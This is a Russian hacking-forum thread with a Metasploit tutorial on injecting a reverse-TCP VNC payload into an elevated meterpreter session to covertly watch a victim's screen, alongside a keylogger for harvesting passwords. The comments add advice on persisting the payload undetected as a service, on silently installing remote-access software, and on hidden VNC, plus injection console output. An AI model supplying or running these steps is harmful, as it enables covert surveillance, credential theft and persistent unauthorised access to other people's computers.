• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Захват VNC сессии на удаленном компьютере.

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 345
BIT
0
Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

upload_2016-9-7_14-37-25.png


(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

> use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

upload_2016-9-7_14-39-13.png


Убеждаемся, что все идет успешно:

upload_2016-9-7_14-39-38.png


В результате этих действий будет открыто окно VNC – сервера:

upload_2016-9-7_14-40-14.png


На этом все, вопросы и пожелания жду в комментариях.
 
Последнее редактирование:
А

Алёша

кто нибудь знает как беспалевно вживить payload на постоянно?
 

Triton

Grey Team
01.10.2016
178
98
BIT
0
кто нибудь знает как беспалевно вживить payload на постоянно?
В отрытой сессии пейлоада:
Пропишет нагрузку как сервис.
Справка:
OPTIONS:

-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
 
  • Нравится
Реакции: m0tion
I

Ishikawa

Под винду можно LiteManager Server ставить с ключем /silent
Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
И можно не только смотреть, но и управлять, режимов масса.
 
O

OmeN

я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?

Это надо вводить в msf консоль
сначало msfconsole запускаем.
 

asshole

One Level
25.03.2017
8
3
BIT
0
Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
 
D

DSW

Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
set LHOST ip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1
 

asshole

One Level
25.03.2017
8
3
BIT
0
set LHOST ip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1

use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

Какая команда указывает жертву?
 
D

DSW

use windows/manage/payload_inject

> set payload windows/vncinject/reverse_tcp

> set LHOST 192.168.0.18 (IP атакуещего)

> set session 2 (Номер вашей сессии с привилегиями)

> set handler true

> exploit

Какая команда указывает жертву?

Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
 

Chena

Green Team
10.02.2017
12
4
BIT
0
Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
 
D

Dmitry88

Подниму старую тему. Не могу побороть вин7 х64. "VNC closed connection" , пейлоад отрабатвывает нормально, а вот подключиться не могу. Утром тестил на х32 все отлично было. Потом пару раз запускал на х64.

Код:
Executing the VNC agent with endpoint 10.10.ххх.ххх:4545...

TigerVNC Viewer 64-bit v1.7.0
Built on: 2017-04-09 14:55
Copyright (C) 1999-2016 TigerVNC Team and many others (see README.txt)
See http://www.tigervnc.org for information on TigerVNC.
meterpreter >
Fri Jun 23 16:46:45 2017
DecodeManager: Detected 2 CPU core(s)
DecodeManager: Creating 2 decoder thread(s)
CConn:       connected to host 127.0.0.1 port 5900
CConn:       End of stream
И все. подключиться не могу.
 
O

OneDollar

[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[-] Handler failed to bind to 192.168.0.102:4433:- -
[*] Started reverse TCP handler on 0.0.0.0:4433
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 3880
[*] Opening process 3880
[*] Generating payload
[*] Allocating memory in procees 3880
[*] Allocated memory at address 0x007a0000, for 281 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3880
[*] Post module execution completed


Но ничего не открывается....
 
7

78tyn8!gert

А если нужны Hide VNC, посоветуете в какую сторону смотреть? Кусочек который отвалился от Зевса не предлагать.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!